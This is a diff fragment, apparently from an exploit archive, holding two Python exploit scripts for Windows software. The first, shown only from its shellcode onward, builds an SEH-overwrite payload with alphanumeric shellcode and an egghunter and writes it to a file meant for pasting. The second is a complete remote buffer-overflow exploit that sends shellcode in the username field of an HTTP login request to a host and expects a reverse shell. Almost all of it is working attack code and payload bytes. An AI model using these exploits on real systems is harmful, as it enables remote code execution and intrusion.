+"\x6a\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x35\x4a"
+"\x42\x35\x2d\x35\x7a\x7a\x42\x2d\x76\x7a\x73\x7a\x50\x25\x4a"
+"\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x35\x25\x35\x35\x2d\x35"
+"\x25\x76\x35\x2d\x35\x39\x52\x69\x50\x25\x4a\x4d\x4e\x55\x25"
+"\x35\x32\x31\x2a\x2d\x74\x74\x74\x5a\x2d\x36\x5a\x74\x30\x2d"
+"\x25\x32\x6a\x38\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a"
+"\x2d\x75\x75\x43\x75\x2d\x43\x6f\x41\x30\x2d\x39\x64\x30\x34"
+"\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x74\x2d\x58"
+"\x6e\x2d\x78\x47\x35\x69\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32"
+"\x31\x2a\x2d\x66\x79\x4f\x66\x2d\x48\x7a\x25\x47\x50\x25\x4a"
+"\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x42\x42\x7a\x42\x2d\x33"
+"\x6d\x55\x32\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d"
+"\x61\x61\x61\x41\x2d\x61\x39\x64\x25\x2d\x59\x33\x7a\x34\x50"
+"\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x66\x66\x66\x66"
+"\x2d\x41\x41\x66\x66\x2d\x25\x33\x66\x66\x2d\x34\x25\x6d\x43"
+"\x50\x25\x4a\x4d\x4e\x55\x25\x35\x32\x31\x2a\x2d\x49\x49\x32"
+"\x49\x2d\x49\x59\x25\x49\x2d\x72\x74\x25\x6d\x50"
+)
+shellcode += "A" * 4000
+
+egghunter = "A" * 40    # serve as NOP's
+egghunter += (
+"\x25\x4a\x4d\x4e\x55"  # and eax, 0x554e4d4a
+"\x25\x35\x32\x31\x2a"  # and eax, 0x2a313235
+"\x2d\x58\x58\x58\x58"  # sub eax, 0x58585858
+"\x2d\x58\x58\x67\x58"  # sub eax, 0x58675858
+"\x2d\x5a\x4f\x2d\x4f"  # sub eax, 0x4f2d4f5a
+"\x50"                  # push eax
+"\x5c"                  # pop esp
+)
+egghunter += (
+"%JMNU%521*-%OOO-%OOO-AzayP%JMNU%521*-r-Pr-"
+"r%Pr-m7ukP%JMNU%521*-wwww-wwwA-wwA--k%FBP%"
+"JMNU%521*-Jk1J-Tk1T-sp%1P%JMNU%521*-WWM6-6"
+"W30-7L%%P%JMNU%521*-WNWW-W%d%-P4wTP%JMNU%5"
+"21*-wt7G-zIvNP%JMNU%521*-1%uu-1%u1-84KYP"
+)
+
+offset  = "A" * (23920-len(shellcode))  # offset to nSEH
+nSEH    = "\x74\x26\x75\x26"            # JE/JNZ + 38 (decimal) 
+SEH     = struct.pack('<L', 0x65263067) # POP,POP,RET (QtGui4.dll [asciiprint])
+trigger = "A" * (40000 - (
+        len(offset)     +
+        len(nSEH)       +
+        len(SEH)        +
+        len(egghunter)  +
+        len(shellcode)
+    )
+)
+
+payload = offset + shellcode + nSEH + SEH + egghunter + trigger
+print "[*] payload written to pasteme.txt"
+fd = open("pasteme.txt", 'w')
+fd.write(payload)
+fd.close()

platforms/windows/remote/42886.py

@@ -0,0 +1,53 @@
+#!/usr/bin/python
+import socket
+
+try:
+	print "\nSending evil buffer..."
+ 
+	shellcode = ("\xba\x31\x13\x39\xe4\xdb\xd3\xd9\x74\x24\xf4\x5e\x33\xc9\xb1"
+	"\x52\x31\x56\x12\x03\x56\x12\x83\xdf\xef\xdb\x11\xe3\xf8\x9e"
+	"\xda\x1b\xf9\xfe\x53\xfe\xc8\x3e\x07\x8b\x7b\x8f\x43\xd9\x77"
+	"\x64\x01\xc9\x0c\x08\x8e\xfe\xa5\xa7\xe8\x31\x35\x9b\xc9\x50"
+	"\xb5\xe6\x1d\xb2\x84\x28\x50\xb3\xc1\x55\x99\xe1\x9a\x12\x0c"
+	"\x15\xae\x6f\x8d\x9e\xfc\x7e\x95\x43\xb4\x81\xb4\xd2\xce\xdb"
+	"\x16\xd5\x03\x50\x1f\xcd\x40\x5d\xe9\x66\xb2\x29\xe8\xae\x8a"
+	"\xd2\x47\x8f\x22\x21\x99\xc8\x85\xda\xec\x20\xf6\x67\xf7\xf7"
+	"\x84\xb3\x72\xe3\x2f\x37\x24\xcf\xce\x94\xb3\x84\xdd\x51\xb7"
+	"\xc2\xc1\x64\x14\x79\xfd\xed\x9b\xad\x77\xb5\xbf\x69\xd3\x6d"
+	"\xa1\x28\xb9\xc0\xde\x2a\x62\xbc\x7a\x21\x8f\xa9\xf6\x68\xd8"
+	"\x1e\x3b\x92\x18\x09\x4c\xe1\x2a\x96\xe6\x6d\x07\x5f\x21\x6a"
+	"\x68\x4a\x95\xe4\x97\x75\xe6\x2d\x5c\x21\xb6\x45\x75\x4a\x5d"
+	"\x95\x7a\x9f\xf2\xc5\xd4\x70\xb3\xb5\x94\x20\x5b\xdf\x1a\x1e"
+	"\x7b\xe0\xf0\x37\x16\x1b\x93\xf7\x4f\x93\xde\x90\x8d\xd3\x21"
+	"\xda\x1b\x35\x4b\x0c\x4a\xee\xe4\xb5\xd7\x64\x94\x3a\xc2\x01"
+	"\x96\xb1\xe1\xf6\x59\x32\x8f\xe4\x0e\xb2\xda\x56\x98\xcd\xf0"
+	"\xfe\x46\x5f\x9f\xfe\x01\x7c\x08\xa9\x46\xb2\x41\x3f\x7b\xed"
+	"\xfb\x5d\x86\x6b\xc3\xe5\x5d\x48\xca\xe4\x10\xf4\xe8\xf6\xec"
+	"\xf5\xb4\xa2\xa0\xa3\x62\x1c\x07\x1a\xc5\xf6\xd1\xf1\x8f\x9e"
+	"\xa4\x39\x10\xd8\xa8\x17\xe6\x04\x18\xce\xbf\x3b\x95\x86\x37"
+	"\x44\xcb\x36\xb7\x9f\x4f\x56\x5a\x35\xba\xff\xc3\xdc\x07\x62"
+	"\xf4\x0b\x4b\x9b\x77\xb9\x34\x58\x67\xc8\x31\x24\x2f\x21\x48"
+	"\x35\xda\x45\xff\x36\xcf")
+
+	inputBuffer = "A" * 780 + "\x83\x0c\x09\x10" + "C" * 4 + "\x90" * 10 + shellcode
+	content="username="+inputBuffer+"&password=A"
+	 
+	buffer="POST /login HTTP/1.1\r\n"
+	buffer+="Host: 192.168.176.139\r\n"
+	buffer+="User-Agent: Mozilla/5.0 (X11; Linux_86_64; rv:52.0) Gecko/20100101 Firefox/52.0\r\n"
+	buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
+	buffer+="Accept-Language: en-US,en;q=0.5\r\n"
+	buffer+="Referer: http://192.168.176.139/login\r\n"
+	buffer+="Connection: close\r\n"
+	buffer+="Content-Type: application/x-www-form-urlencoded\r\n"
+	buffer+="Content-Length: "+str(len(content))+"\r\n"
+	buffer+="\r\n"
+	buffer+=content
+	 
+	s = socket.socket (socket.AF_INET, socket.SOCK_STREAM)
+	s.connect(("192.168.176.139", 80))
+	s.send(buffer)
+	s.close()
+	print "\nDone did you get a reverse shell?"
+except: 
+	print "\nCould not connect!"